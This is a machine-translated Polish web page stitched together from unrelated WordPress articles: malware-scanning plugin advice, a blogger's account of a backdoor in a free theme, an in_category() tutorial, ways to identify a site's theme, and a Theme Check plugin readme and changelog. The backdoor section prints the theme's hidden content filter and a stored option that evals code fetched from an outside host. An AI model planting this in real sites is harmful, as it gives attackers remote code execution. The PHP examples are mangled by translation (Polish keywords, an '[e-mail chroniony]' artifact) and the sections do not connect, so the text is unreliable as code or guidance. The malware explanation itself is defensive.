Niezbędne jest okresowe sprawdzanie witryny pod kątem złośliwych wirusów — to pierwsze przykazanie każdego szanującego się webmastera. Nawet jeśli użyjesz czystego motywu Twenty Eleven, nie jest faktem, że z biegiem czasu również nie został zainfekowany. Zjawisko to może (i najczęściej ma miejsce) wynikać z faktu, że sam silnik WordPressa został pierwotnie zaprojektowany do publikowania online. Więc nigdy nie zaszkodzi sprawdzić ponownie i zrobić kopię witryny i bazy danych.

Na przykład ja (oczywiście po pewnym czasie) doszedłem do jednego wniosku - wystarczy dobry hoster, a problemy z rezerwacją znikną same. Nie muszę teraz robić kopii zapasowej bazy danych ani strony - hoster robi wszystko za mnie i to automatycznie. W dowolnym momencie, jeśli chcesz, możesz zamówić kopię dowolnej sekcji swojego bloga (i nie tylko), pobrać tę kopię lub przywrócić bloga bezpośrednio z panelu sterowania. Oznacza to, że nie muszę pobierać kopii zapasowej, wszystko dzieje się automatycznie - kopia zapasowa, przywracanie itp. Jest to wygodne, ponieważ mogę śledzić nie tylko dzień, ale także godzinę, kiedy wirus pojawił się na moim blogu i odpowiednio podjąć działania w celu jego wyeliminowania.

Zacznę od dobrych wieści - przynajmniej dwie wtyczki, których użyłem dają ładne wyniki wykrywanie i lokalizacja złośliwego kodu. Są to wtyczki AntiVirus i Exploit Scanner. Nie uwierzysz, ile złego kodu jest na Twoim blogu! Ale nie traktuj wszystkich uzyskanych informacji po sprawdzeniu jako dogmatu - wiele wierszy, które wykrywają te wtyczki, w rzeczywistości nie niesie w sobie nic złego. Po prostu wtyczka kwestionuje kilka linii, to wszystko. Aby to zweryfikować, sprawdź ręcznie fragmenty, które wtyczka zidentyfikowała jako złośliwe. Tak więc, sprawdzając wtyczkę Antywirus Okazało się, że nawet proste wywołanie funkcji get_cache_file() jest już uważane za podejrzane przez wtyczkę. Tak więc wszystkie wyniki kontroli będą musiały być śledzone ręcznie. Ale to na przykład jest naprawdę zainfekowany link i należy go usunąć:

Skąd wiesz, czy to wirus, czy powinien być? Wszystko jest bardzo proste - porównaj swój czysty szablon (jeśli istnieje) i porównaj go (plik po pliku) z tym, który jest zainstalowany i przeszedł już pewne zmiany. Nie trzeba dokonywać porównania bezpośrednio i dosłownie, wystarczy skorzystać z wyszukiwania, aby sprawdzić, czy czysty szablon zawiera linię podświetloną przez wtyczkę. Jeśli tak, kliknij przycisk „To nie jest wirus”, a ta linia nie zostanie uwzględniona podczas następnego sprawdzania.

A oto przykład drugiej wtyczki, którą wypróbowałem - Skaner wykorzystania

Jak widać, tutaj wszystko jest znacznie bardziej zaniedbane. Dla mnie ten wynik był szokujący. Ale to nie wszystko. Wtyczka posiada taką funkcję jak sprawdzanie. Jeśli więc go włączysz, okaże się, że blog powinien składać się z tekstu i maksymalnie kilku tabel CSS. Wydaje mi się więc, że autor wtyczki oczywiście przesadził z bezpieczeństwem. Dobrze, że wtyczka pokazuje tylko rzekomo zainfekowane fragmenty i nie czyści ich.

Po przeanalizowaniu wszystkich linii zaznaczonych na żółto możesz łatwo wykryć złośliwe oprogramowanie (złośliwy kod), cóż, co z nim dalej zależy od Ciebie. Metoda czyszczenia jest nadal taka sama - porównaj wybrany kod z kopią zapasową witryny (patrz) i jeśli znajdziesz rozbieżności, dowiedz się, czy zrobiłeś to sam, czy ktoś zrobił to za Ciebie, co oznacza, że ​​to już nie jest dobre i może okazać się wirusem. Nawet programiści WordPressa zalecają sprawdzenie witryny pod kątem złośliwego kodu za pomocą tej konkretnej wtyczki. Ale są takie nieszkodliwe wstawki, na przykład w treści ramki iframe, które wtyczka może również wykryć jako zainfekowany kod. Ale w rzeczywistości bez tych wierszy ta sekcja twojego bloga nie będzie działać poprawnie.

W jaki sposób złośliwe oprogramowanie może w ogóle dostać się do plików bloga i co to jest z definicji? Słowo złośliwe oprogramowanie dosłownie oznacza: złośliwy oprogramowanie , z angielskiego złośliwego oprogramowania. Jest to dowolne oprogramowanie, które może służyć do nieautoryzowanego dostępu do witryny i jej zawartości. Pewnie wyobrażasz sobie, że dla wyszkolonego przeciętnego hakera zhakowanie strony nie będzie trudne, zwłaszcza po rejestracji. Następnie możesz dowolnie modyfikować treść bloga - byłaby to edukacja.

Złośliwe złośliwe oprogramowanie może być również wstawiane do wtyczek, z których instalujesz nieznane źródło, a także w skryptach, które czasami bierzesz bez sprawdzania, ale ufając autorowi. Najbardziej nieszkodliwym złośliwym oprogramowaniem jest link do autora modułu, który zainstalowałeś na stronie. A jeśli sam autor nie ostrzegał, że taki link istnieje, to jest to już czysty wirus.

Więc zainstalowałem na blogu testowym nowy temat, a po usunięciu jednego nieszkodliwego linku do jakiegoś męskiego klubu w piwnicy strony w ogóle przestało się otwierać, a na głównym pojawił się napis - „Nie masz prawa usuwać linków”. Oto darmowy motyw dla Ciebie. Możesz przeczytać o tym, jak wyrywać takie lewe linki.

Twoja baza danych może być również wykorzystana do uruchomienia złośliwego kodu. Bardzo często do postów lub komentarzy dodawane są również spamerskie linki. Takie linki są zwykle ukryte, gdy Pomoc CSS aby niedoświadczony administrator ich nie widział, ale system wyszukiwania rozróżnij je natychmiast. Oczywiście w grę wchodzi każdy program antyspamowy, na przykład ten, który jest wielokrotnie licencjonowany, sprawdzany i ponownie sprawdzany. Haker może pobierać pliki z rozszerzeniami plików graficznych i dodawać je do kodu aktywowanych wtyczek. Dlatego nawet jeśli plik nie ma rozszerzenia php, kod w tym pliku można uruchomić.

Jest jeszcze jedno proste narzędzie, od którego zacząłem swoją znajomość złośliwego oprogramowania - wtyczka Theme Authenticity Checker (TAC). Jest lekki i wystarczająco wydajny, ale sprawdza tylko Twoje tematy, nawet te, które nie są aktywne. Nie dotyka pozostałych katalogów i to jest jego minus. Oto, co uzyskałem po sprawdzeniu mojego obecnego motywu za pomocą tej wtyczki:

Dwa ostrzeżenia w aktywnym temacie i nic więcej. Nie ma złośliwego kodu. Nawiasem mówiąc, są to linki, które sam wstawiłem za radą Google - aby poprawić jakość fragmentu (wyświetlać dane osobowe, adres organizacji itp.). Ale to tylko sprawdzanie plików motywów, a co jest robione w innych katalogach, będziesz musiał się dowiedzieć za pomocą innych wtyczek lub usług online. Na przykład taka usługa (zasługuje na zaufanie) jak Yandex Webmaster lub podobna w Google. Mają funkcję sprawdzania dowolnego zasobu internetowego pod kątem złośliwych wtrąceń i robią to skutecznie. Ale jeśli to Ci nie wystarczy, porównaj wyniki z wynikami w innych serwisach i wyciągnij wnioski.

Z jakiegoś powodu chcę wierzyć Yandexowi, a nie wtyczkom. Innym dobrym zasobem jest http://2ip.ru/site-virus-scanner/. Oto, co znalazłem po sprawdzeniu jednego z moich blogów:

Tutaj możesz również sprawdzić poszczególne pliki pod kątem złośliwego kodu, jeśli masz takie wątpliwości. Ogólnie usługa jest dobra.

Z powyższego wyciągnąłbym następujące wnioski:

1. Aby zapobiec pojawieniu się złośliwego kodu, musisz przede wszystkim korzystać z zaufanych usług do pobierania plików - wtyczek, motywów itp.

2. Regularnie rób kopie zapasowe wszystkiego, co zawiera strona - bazy danych, treści, panel administracyjny, w tym wgrywane pliki firm trzecich.

3. Korzystaj z aktualizacji oferowanych przez WordPress. Są co najmniej wolne od wirusów, choć nie zawsze są uzasadnione funkcjonalnie. Ale aktualizując, usuwasz w ten sposób wirusy, które mogą być obecne.

4. Nieużywane motywy, wtyczki, obrazy i pliki, usuwaj bez żalu - to kolejna awaria złośliwego oprogramowania, której możesz nigdy nie zgadnąć.

5. Pamiętaj o zabezpieczeniu hasłem dostępu do FTP, loginu PhpAdmin, panelu administracyjnego i ogólnie tam, gdzie nikt oprócz Ciebie nie powinien mieć dostępu.

6. Spróbuj (nawet jeśli to pragnienie jest tak wielkie jak niebo) nie zmieniaj ani nie zastępuj podstawowych plików WordPressa - programiści wiedzą lepiej, co i jak powinno działać.

7. Po wykryciu i usunięciu wirusów zmień wszystkie hasła. Myślę, że będziesz miał wielką ochotę stworzyć hasło składające się ze 148 znaków w różnych rejestrach i ze znakami specjalnymi. Ale nie daj się ponieść emocjom złożone hasła, można to zgubić, a potem trzeba wszystko przywrócić, co nie jest zbyt przyjemne.

Wszystkie te metody i komponenty, które opisałem, które pomogą Ci pozbyć się wirusów są oczywiście bezpłatne, oczywiście prawie domowe i oczywiście nie dają 100% gwarancji, że Twoja witryna zostanie oczyszczona złośliwe wstawki. Dlatego jeśli już martwisz się o czyszczenie bloga, lepiej skontaktować się z profesjonalistami, na przykład w serwisie Sucuri(http://sucuri.net/). Tutaj Twoja witryna będzie dokładnie monitorowana, zostaną podane praktyczne zalecenia, które zostaną wysłane do Ciebie listownie, a jeśli nie chcesz samodzielnie sprzątać witryny, do Twojej dyspozycji są specjaliści, którzy zrobią wszystko w najlepszy możliwy sposób w ciągu 4 godzin:

Otóż ​​tak wygląda mój blog testowy po monitoringu i to pomimo tego, że inne metody (homebrew) zawsze pokazują inne wyniki. Jak widać, test jest darmowy, ale jeśli zostaną znalezione wirusy, powinieneś zapłacić za ich usunięcie bez szkody dla strony (chyba że jesteś guru od czyszczenia blogów ze złośliwego oprogramowania).

Jeszcze raz podkreślę, że hakerzy są w pogotowiu, wirusy są ciągle aktualizowane i nie da się wszystkiego na bieżąco śledzić. Wszystkie innowacje są tak starannie ukryte i zakamuflowane, że tylko zespół może je ujawnić! zawodowców, a nie samouków, jak wielu z nich. Dlatego ręczne wykrywanie i usuwanie złośliwego oprogramowania jest tak nieskuteczne: brak doświadczenia - brak rezultatu, ale jest wirus. Posługiwać się programy licencjonowane i powierzyć eliminację zagrożeń profesjonalistom

Cześć przyjaciele. Czy jesteś pewien, że darmowy szablon WordPress, którego używasz na swoich stronach internetowych i blogach, jest naprawdę bezpieczny i nie zawiera ukrytych zagrożeń ani złośliwego kodu? Czy jesteś tego całkowicie pewien? Absolutnie?)

Myślisz, że przejrzeli szablon, usunęli z niego ukryte linki i gotowe. Okresowo skanujesz pliki witryny za pomocą programu antywirusowego, zaglądasz do narzędzi webmastera Yandex w zakładce Bezpieczeństwo i z ulgą widzisz tam komunikat: „ Na stronie nie znaleziono złośliwego kodu«.

Ja też tak myślałem. Nie chcę cię denerwować, ale...

Ukryty niebezpieczny kod w darmowych motywach WordPress

To jest list, który otrzymałem w zeszłym tygodniu w mailu od mojego gospodarza. Niedawno wprowadzili regularne sprawdzanie wszystkich plików witryny pod kątem złośliwej zawartości, a mimo to znaleźli tę zawartość we mnie!

Wszystko zaczęło się od tego, że pewnego dnia wszedłem na swoją stronę i nie mogłem jej uruchomić - wyszedł obraźliwy napis o nie znalezionych plikach z rozszerzeniem php. Po lekkim napięciu poszedłem zbadać zawartość folderu z witryną na hostingu i od razu odkryłem problem - mój plik szablonu fuctions.php został przemianowany na functions.php.malware, co niejako niejednoznacznie wskazywało - program antywirusowy lub coś w tym rodzaju działał tutaj) Po wejściu do poczty znalazłem powyższy raport od hostera.

Przede wszystkim oczywiście zacząłem sprawdzać ten plik, studiowałem jego zawartość, skanowałem go wszelkiego rodzaju antywirusami, dziesiątkami usług skanowania wirusów online itp. - w końcu nic nie znalazłem, wszyscy jednogłośnie twierdzili, że plik jest całkowicie bezpieczny. Oczywiście wyraziłem swoje wątpliwości hosterowi, mówiąc, że coś schrzaniłeś, ale na wszelki wypadek poprosiłem go o dostarczenie raportu o wykryciu złośliwego fragmentu kodu.

I tak mi powiedzieli

Wszedłem na google informacje o tym kodzie i poważnie się nad tym zastanowiłem...

Jak znaleźć fragment złośliwego kodu w szablonie

Jak się okazało, jest to naprawdę nietrywialna sztuczka, która pozwala zainteresowanym przenosić dane do Twojej witryny i zmieniać zawartość stron bez Twojej wiedzy! Jeśli korzystasz z darmowego szablonu, to Gorąco polecam sprawdzenie pliku functions.php w poszukiwaniu następującego kodu:

add_filter('treść', '_bloginfo', 10001);
funkcja _bloginfo($treść)(
globalny $post;
if(jest_single() && ( [e-mail chroniony](get_option('opcja bloga'))) !== false)(
zwróć $co;
) w przeciwnym razie zwraca $treść;
}

Nawet przy mojej bardzo płytkiej znajomości php widać, że tworzony jest pewien filtr, który jest powiązany ze zmienną globalną post i content, które są odpowiedzialne za wyświetlanie treści tylko na stronach postów na blogu (warunek is_single). Już podejrzane, prawda? Cóż, teraz zobaczmy, co to wyświetli podany kod na naszej stronie internetowej.

Ciekawa opcja blogowania, o którą proszono w bazie danych, również wygląda bardzo podejrzanie. Wchodzimy do naszej bazy danych MySQL i znajdujemy tam tabelę o nazwie wp_options, jeśli nie zmieniłeś prefiksów, to domyślnie będzie wyglądać tak. I w nim znajdujemy interesującą nas linię zwaną blogoption

Co za piękność! Widzimy następującą opcję

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Tych. nam z określonej strony (co więcej, rosyjski, pamiętaj) zwracamy treści, które mogą zawierać wszystko! Dowolna liczba linków, złośliwe kody, zmieniony tekst itp. Sama strona podczas uzyskiwania do niej dostępu podaje błąd dostępu 403, co nie jest zaskakujące. Oczywiście usunąłem też tę opcję z bazy.

Zgodnie z informacjami od ofiar, dokładnie treść twojego artykułu jest zwykle zwracana tylko z jedną modyfikacją - zamiast kropki "." otwarty link został zamaskowany w tekście! A tak przy okazji, ta opcja jest zapisywana w bazie danych po zainstalowaniu samego szablonu, a następnie kod, który to robi, bezpiecznie ulega autodestrukcji. I żyłem z takimi śmieciami przez dwa lata i przez cały ten czas ani jeden program antywirusowy ani usługa nie ujawniły mi tego zagrożenia. Szczerze mówiąc, nie zauważyłem, czy ta technika kiedykolwiek zadziałała dla mnie, czy moja wtyczka bezpieczeństwa zablokowała tę możliwość (a może jedna z aktualizacji WordPressa zamknęła tę dziurę), ale nadal jest to nieprzyjemne.

Morał wolnego sera

Jak podoba Ci się wyrafinowanie naszych „tłumaczy” szablonów (lub tych, którzy umieszczają je w swoich katalogach)? Nie wypada wycinać linków ze stopki) Szkoda, że ​​nie pamiętam skąd pobrałem mój szablon, to było dawno temu, inaczej napisałbym kilka czułych. A gdybym w tamtym czasie miał takie samo doświadczenie, jakie mam teraz, to na pewno nie skorzystałbym z darmowego szablonu, lub w skrajnych przypadkach nie pobierałbym z nieznanych źródeł!

Łatwiej jest kupić jakiś oficjalny szablon premium za 15-20 dolarów na ten sam i żyć w spokoju, wiedząc, że nie ma w nim dziur i zaszyfrowanych linków, a nawet jeśli są luki, programiści na pewno wydadzą aktualizację, w której te otwory zostaną zamknięte. ( Nawiasem mówiąc, Artem niedawno opublikował artykuł, w którym po prostu mówi o szablonach premium, a nawet dystrybuuje kody promocyjne na brutalne zniżki dla zainteresowanych)

Wyobraź sobie, że wyświetlasz rekordy i musisz zmienić wygląd zewnętrzny w zależności od rubryki. Na przykład masz blok „O AUTORZE”, który wyświetla informacje o autorze artykułu, ale nie chcesz widzieć tego bloku np. pod postami z kategorii, w której nie jest to konieczne. Możesz także wyłączyć komentowanie w określonych kategoriach, miniaturach itd. Wszystko zależy od Twoich potrzeb i fantazji. Osobiście bardzo często stosuję ten warunek.

Aby filtrować wpisy w zależności od kategorii, funkcja pomoże - w_kategorii(). Ta funkcja sprawdza, czy aktualny lub podany wpis należy do żądanej kategorii, dobrze, czy do kilku kategorii. Najczęściej ta funkcja jest wyprowadzana w pliku pojedynczy.php, ponieważ odpowiada za wyświetlanie rekordów.

Najprostszy sposób użycia funkcji wyglądałby mniej więcej tak. Dodajemy ten kod do pliku single.php, w razie potrzeby dołączamy tagi w PHP.

Tagi PHP wyglądają tak:

Jeśli Twój motyw używa głównie kodu HTML, wklej poniższy kod bez zmian. Jeśli PHP jest używane głównie, wtedy tagi, w których zawarty jest kod, mogą zostać usunięte.

W tym kodzie stawiamy warunek, że jeśli aktualny post należy do kategorii o ID - 12, to coś musi się wyświetlić. Cokolwiek chcesz, dodaj wewnątrz nawiasów klamrowych. Powinien to być kod PHP, jeśli jest to trudne i musisz dodać kod HTML, to zerwij kod tymi samymi tagami PHP, a kod będzie wyglądał tak:

//tutaj piszemy zwykły kod HTML lub po prostu tekst.

Aby określić identyfikator kategorii, musisz przejść do listy kategorii w panelu administracyjnym i najechać kursorem na wybraną. W dolnej części okna przeglądarki, po prawej stronie, pojawi się link, w którym będzie coś w rodzaju ID=1, czyli identyfikator tej kategorii to 1.

Jeśli chcesz określić kilka kategorii, podaj je oddzielone przecinkami. Może być również konieczne utworzenie warunku „JEŻELI - TO”, wtedy kod będzie wyglądał mniej więcej tak:

Wyobraź sobie, że musisz wyświetlić miniaturę posta w rubryce 12, a pierwszy obrazek z tekstu w innych postach z innych rubryk. Czy tak się dzieje i jak to zrobić? Z powyższym kodem. Możesz przeczytać o wyjściu pierwszego obrazu z rekordu w artykule -

Teraz chcę pokazać jeszcze jedną funkcję, którą można dodać do tej funkcji. Zdarza się, że rubryki mają podkategorie, czyli kategorie potomne. A jeśli wpis należy do jednej z podkategorii, warunek go ominie. Jeśli tego potrzebujesz, nie możesz niczego dotknąć, ale jeśli mimo to warunek powinien działać dla podtytułów, musisz dodać dodatek do warunku. Na początek musisz dodać następującą część do samego warunku - || post_is_in_descendant_category(12). To jest wywołanie naszej nowej funkcji, która będzie sprawdzać podkategorie. Gotowy kod będzie wyglądał tak:

Aby nowa funkcja zaczęła działać, musisz dodać kod dla samej funkcji, czyli musisz ją napisać. Aby to zrobić, znajdź w folderze z aktywnym motywem plik funkcje.php, który zawiera funkcje zdefiniowane przez użytkownika. Jeśli nie znasz PHP, musisz dodać kod na samym końcu pliku, ale jeśli jest zamknięcie PHP tag - ?> , musisz dodać przed nim. Sam kod wygląda tak:

Funkcja post_is_in_descendant_category($cats, $_post = null) ( foreach ((tablica) $cats as $cat) ( // get_term_children() akceptuje tylko identyfikatory całkowite $descendants = get_term_children((int) $cat, "category"); if ($descendants && in_category($descendants, $_post)) return true; ) return false; )

Jeśli wszystko zostanie zrobione poprawnie, twój warunek wybierze posty dla określonych kategorii i ich podkategorii.

Dawno temu zacząłem pisać ten artykuł, ale wszystkie ręce nie doszły do ​​końca, potem jedna, potem druga przerwała. Wreszcie artykuł się skończył i być może wiele osób pomoże rozwiązać problem.

To wszystko, dzięki za uwagę.

Czy zastanawiałeś się kiedyś, jakiego motywu używa dana witryna?

Często w poszukiwaniu idealnego motywu przeglądamy inne zrealizowane projekty, aby znaleźć coś podobnego lub zrobić naszą stronę o tym samym motywie, tylko z własnym, indywidualnym projektem.

W tym samouczku pokażemy Ci narzędzia i sztuczki, których możesz użyć, aby dowiedzieć się, jakiego motywu używa ta witryna WordPress.

Metoda 1: Witryna weryfikacji IsItWP

Najłatwiej jest wejść na isitwp.com i sprawdzić interesującą Cię witrynę.

Jest to narzędzie online, które pokaże Ci, jakiego motywu używa WordPress i czy WordPress jest w ogóle używany w witrynie.

Jeśli witryna korzysta z WordPressa, IsItWP spróbuje znaleźć nazwę bieżącego motywu.

Spróbuje również dowiedzieć się, jakie aktywne wtyczki są używane na stronie:

Jeśli masz szczęście i nie jest to motyw niestandardowy ani podrzędny, IsItWP poda nazwę motywu i możesz dalej wyszukiwać ten motyw.

Metoda 2. Zdefiniuj ręcznie

Czasami właściciele witryn lub programiści zmieniają nazwę rodzimego użytkownika Motywy WordPress. W takim przypadku narzędzia takie jak IsItWP nie będą w stanie Ci pomóc.

Ale mimo to w kodzie witryny mogą znajdować się różne wskazówki, które pomogą Ci dowiedzieć się, jaki rodzaj motywu jest zainstalowany.

Zobaczmy.

Każdy motyw WordPress musi mieć styl.css. Ten plik zawiera wewnątrz nagłówek, który z reguły wskazuje nazwę motywu, autora motywu, wersję i witrynę programisty motywu. Określa również inne szablony css, z których korzysta motyw.

Aby znaleźć ten plik, najpierw musisz przejść do samej witryny. Kliknij prawym przyciskiem myszy gdzieś na stronie głównej i przejdź do widoku kodu źródłowego ( Zobacz stronę źródłową).

Kod źródłowy strony głównej witryny otworzy się w przeglądarce w nowej karcie.

Teraz musisz znaleźć wiersz kodu, który wygląda mniej więcej tak:

Aby to ułatwić, możesz przeszukać tę kartę za pomocą fragmentu kodu „ motywy". To jest część katalogu, w którym styl.css.

W ten sposób znajdziesz ścieżkę, w której znajduje się plik style.css i możesz otworzyć ten plik bezpośrednio w przeglądarce w nowej karcie.

Na górze style.css będzie nagłówek z nagłówkiem (o którym mówiliśmy powyżej). To są informacje serwisowe dotyczące tematu. Wygląda to mniej więcej tak:

/* Nazwa motywu: Nazwa motywu URI motywu: https://example.com Autor: ThemeAuthorName URI autora: https://example.com Opis: Mój motyw to elastyczny motyw WordPress przeznaczony dla witryn z portfolio Wersja: 1.1.47 Licencja: Powszechna Licencja Publiczna GNU v2 lub nowsza Licencja URI: http://www.gnu.org/licenses/gpl-2.0.html Tekst Domena: hestia Tagi: blog, niestandardowe-logo, portfolio, e-commerce, rtl-language-support , post-formaty, układ siatki, jednokolumnowy, dwukolumnowy, niestandardowe tło, niestandardowe kolory, niestandardowy nagłówek, niestandardowe menu, nagłówek z polecanym obrazem, polecane obrazy, elastyczny nagłówek, o pełnej szerokości -szablon, przyklejony post, opcje motywu, komentarze w wątkach, gotowe do tłumaczenia */

Z tego bloku możesz znaleźć nazwę tematu i adres programisty. Pozostaje tylko znaleźć ten temat w Internecie.

Metoda 3. Jak znaleźć motyw nadrzędny

Wiele witryn używa motywów podrzędnych do dostosowywania wyglądu. I to jest całkiem słuszne podejście.

W takim przypadku, jeśli znalazłeś plik styl.css z motywu potomnego, jego nagłówek będzie zawierał informacje o motywie nadrzędnym:

/* Nazwa motywu: Mój motyw potomny Opis: Tylko motyw potomny Autor: Peter Smith Adres URL autora: Wpisz tutaj adres URL bloga lub strony internetowej autora Szablon: hestia Wersja: 1.0 Licencja: Powszechna Licencja Publiczna GNU v2 lub nowsza URI licencji: http :/ /www.gnu.org/licenses/gpl-2.0.html Tekst Domena: my-child-theme */

W powyższym przykładzie parametr „ Szablon”, co oznacza, że ​​motyw nadrzędny „Hestia” jest używany dla tego motywu potomnego.

Możesz również dowiedzieć się o motywie nadrzędnym z kodu źródłowego opisanego w Metodzie 2. W kodzie znajdziesz odwołanie do pliku style.css nie tylko z motywu potomnego, ale także z motywu nadrzędnego.

Ale nie zapominaj, że programista może spróbować zmienić wszystkie nagłówki style.css na własne, w takim przypadku bardzo trudno byłoby określić oryginalny motyw.

Wtyczka do sprawdzania motywów to łatwy sposób na przetestowanie motywu i upewnienie się, że jest zgodny z najnowszymi standardami recenzji motywów. z tym, możesz uruchom w swoim motywie te same automatyczne narzędzia testowe, których używa WordPress.org do przesyłania motywów.

Testy są przeprowadzane za pomocą prostego menu administracyjnego, a wszystkie wyniki są wyświetlane jednocześnie. Jest to bardzo przydatne dla twórców motywów lub każdego, kto chce się upewnić, że ich motyw obsługuje najnowsze standardy i praktyki dotyczące motywów WordPress.

Jak włączyć formatowanie trac?

Zespół Theme Review używa tej wtyczki podczas przeglądania motywów i kopiowania/wklejania danych wyjściowych do biletów trac, system trac ma swój własny język znaczników.
Aby włączyć formatowanie trac w Theme-Check, musisz zdefiniować kilka zmiennych w wp-config.php:
TC_PRE oraz TC_POST są używane jako nagłówek i stopka biletu.
Przykłady:
define('TC_PRE', 'Recenzja motywu:[]
- Motywy należy przejrzeć za pomocą "define(\'WP_DEBUG\', true);" wp-config.php[]
— Tematy powinny być przeglądane przy użyciu danych testowych z tematycznych list kontrolnych (TC)
——
‘);

Define("TC_POST", "Jeśli masz jakiekolwiek pytania, komentarze lub opinie, możesz skorzystać z poniższych danych kontaktowych:[] [] * Zostaw komentarz do tego zgłoszenia[] * Wyślij e-mail na adres e-mail recenzji motywu list[] * Użyj kanału IRC #wordpress-themes na Freenode.");

Jeśli zarówno z tych dwóch zmiennych są zdefiniowane, nowe pole wyboru trac pojawi się obok Sprawdź to! przycisk.

Często Zadawane Pytania

Numer wersji to data rewizji wytycznych użytych do jej utworzenia.

Dlaczego oznacza coś tak złego?

Nie oznacza to oznaczania „złych” rzeczy jako takich. Kontrola motywu została zaprojektowana jako niedoskonały sposób testowania zgodności z wytycznymi dotyczącymi przeglądu motywu. Nie wszystkie motywy muszą być zgodne z tymi wytycznymi. Celem narzędzia sprawdzającego jest upewnienie się, że motywy przesłane do centralnego repozytorium motywów WordPress.org spełniają najnowsze standardy motywów WordPress i będą działać w wielu różnych witrynach.

Wiele witryn korzysta z niestandardowych motywów i to jest w porządku. Jednak motywy przeznaczone do użytku publicznego w wielu różnych rodzajach witryn muszą mieć określony minimalny poziom możliwości, aby zapewnić prawidłowe funkcjonowanie w wielu różnych środowiskach. Wytyczne dotyczące przeglądu motywów są tworzone z myślą o tym celu.

To narzędzie do sprawdzania motywów nie jest i nigdy nie będzie idealne. Jest to tylko narzędzie pomagające autorom motywów lub każdemu, kto chce zwiększyć możliwości swojego motywu. Wszystkie motywy przesłane do WordPress.org są ręcznie sprawdzane przez zespół ekspertów. Automatyczne sprawdzanie motywów ma być tylko użytecznym narzędziem, a nie absolutnym systemem miar.

Ta wtyczka nie decydować o zastosowanych wytycznych. Wszelkie kwestie związane z wytycznymi dotyczącymi przeglądu poszczególnych motywów należy omówić na stronie Make Themes .

Opinie

To świetna wtyczka dla każdego, kto naprawdę lubi rozwijać motyw WordPress i pomyślnie testować podstawowe standardy WordPress. Błędy rozdzielone na „Wymagane”, „Ostrzeżenie”, „Zalecane” i „Informacje”. Podaj również podstawowe informacje o tym błędzie i wyjaśnij, gdzie jest problem.

Członkowie i programiści

Theme Checker to projekt typu open source. Następujący współtwórcy przyczynili się do rozwoju wtyczki:

Dziennik zmian

20190801.1

• Napraw brakującą liczbę jednorazową i jednorazową kontrolę na stronie administratora. rekwizyty Stevena Sterna za zgłoszenie problemu zespołowi wtyczek. Chociaż technicznie jest to CSRF, nie wynika z niego żadna luka, ponieważ jedyne, co można zrobić z formularzem, to zeskanować motyw.

20190208.1

• Dodaj nowe style do edytora bloków. Zobacz https://meta.trac.wordpress.org/ticket/3921

20160523.1

• Naprawiono nazwy motywów z myślnikami
• Komentarze usuwające zmiany
• Wiele zmian wprowadzonych przez zespół ds. przeglądu tematycznego i innych. Zobacz Github dla pełnej listy zmian.

20151211.1

• Pełna synchronizacja z Github i wszystkimi zmianami, które tam zaszły.
• Wydanie dla nieaktualnych funkcji 4.4.

20140929.1

• Dodano nowe czeki i aktualizacje od Franka Kleina z Automattic. Dzięki Frank!
• Zaktualizowane wykazy przestarzałych funkcji
• Sprawdzenie dostosowania: wszystkie ustawienia add_settings muszą używać wywołań zwrotnych sanityzacji, ze względów bezpieczeństwa
• Kontrole terytorium wtyczek: Motywy nie mogą rejestrować typów postów ani taksonomii ani dodawać skrótów do treści postów
• Widgety: Wywołania register_sidebar muszą być wywoływane z haka akcji widgets_init
• Tytuł: tagi muszą istnieć i nie mieć w sobie coś innego niż wywołanie wp_title()
• CDN: Sprawdza, czy używane są wspólne sieci CDN (zalecane tylko)
• Uwaga: Zmieniono identyfikatory URI wtyczki i autora, ponieważ stare identyfikatory URI są nieprawidłowe. Mogą się one zmienić w przyszłości, URI do mojej własnej witryny są tylko tymczasowe.

20131213.1

• Poprawiono błędy niewyświetlane przez wtyczkę i błędnie dające wynik "zaliczeniowy" do wszystkiego.

20131212.1

• Zaktualizowano do 3,8
• Większość plików została zmieniona dla lepszej obsługi I18N, więc pliki językowe zostały tymczasowo usunięte, dopóki tłumaczenie nie będzie mogło zostać ponownie wykonane.

20121211.1

• Zaktualizowano do 3,5
• Usuń przycisk PayPal.

20110805.1

• Usunięto kontrole TimThumb.
• Zrzut ekranu jest teraz podglądany w wynikach, z rozmiarem pliku i wymiarami.

20110602.2

• Nowe funkcje listy plików ukryte foldery są teraz wykrywalne.
• Lepsze kontrole fopen.
• Wersja Tima Thumb

20110602.1

• Sprawdzanie stylu zakończenia linii w systemie DOS/UNIX jest teraz wymagane do prawidłowego przesyłania motywu.
• Uderzenie wersji Timthumb
• Kilka poprawek zgłoszonych przez GaryJ
• 3.2 dodano przestarzałe funkcje

20110412.1

• Napraw wyrażenie regularne
• Dodano sprawdzanie najnowszego hacka do wstrzykiwania stopki.
• Napraw sprawdzanie tagów, aby poprawnie używać nowej funkcji treści
• Synchronizacja wszystkich zmian dokonanych dla sprawdzenia motywu wporg uploader.
• Zaktualizowany wpis dotyczący kontroli 3.1. dodano sprawdzanie zrzutów ekranu do svn.
• Napraw sprawdzanie linków, aby w niektórych przypadkach nie zwracać fałszywego błędu
• rm jeden z testów, który powoduje problemy z uploaderem wporg (i który jest również niepotrzebny)
• Przenieś niepotrzebne funkcje z checkbase do main.php.
• Tylko drobne zmiany formatowania (odstępy itp.)
• Dodaj sprawdzenie dla wp_link_pages() + fix eval() check

20110219.2

• Połączono nowe rekwizyty interfejsu Gua Bob
• Ostatnio testowany motyw jest zawsze wstępnie wybierany na liście motywów.
• Naprawiono błąd php w admin_menu.php

20110219.1

• Zobacz dziennik zatwierdzenia zmian.

20110201.2

• Poprawiono błąd interfejsu użytkownika w rekwizytach postu na forum Mamaduka.
• Textdomain sprawdza dwadzieścia dziesięć i brak domeny.
• Napraw div, który nie zamyka rekwizytów Mamaduka.

20110201.1

• i18n działa
• sr_RS de_DE ro_RO langs rekwizyty Daniel Tara i Emil Uzelac.
• Dodano obsługę motywów potomnych, kontrole wykonywane względem rodzica i dziecka w czasie wykonywania.
• Dodano przycisk formatowania Trac dla recenzentów.

20101228.3

• Ostatnia wersja 3.1 (mam nadzieję)
• Chips sugeruje sprawdzenie włączenia searchform.php (nie
  jeszcze idealne, potrzebujesz więcej przykładów do wyszukania).
• add_theme_page jest wymagana, wszystkie inne są oznaczone i wyświetlane z linią
  liczby.
• Przeważnie umiędzynarodowiona, potrzebuje tłumaczeń teraz.
• Poprawki błędów.

20101228.2

• Dodano sprawdzanie menu.
• ThemeURI AutohourURI dodane do wyników.
• Wiele drobnych poprawek.
• Rozpoczęto tłumaczenie.

20101228.1

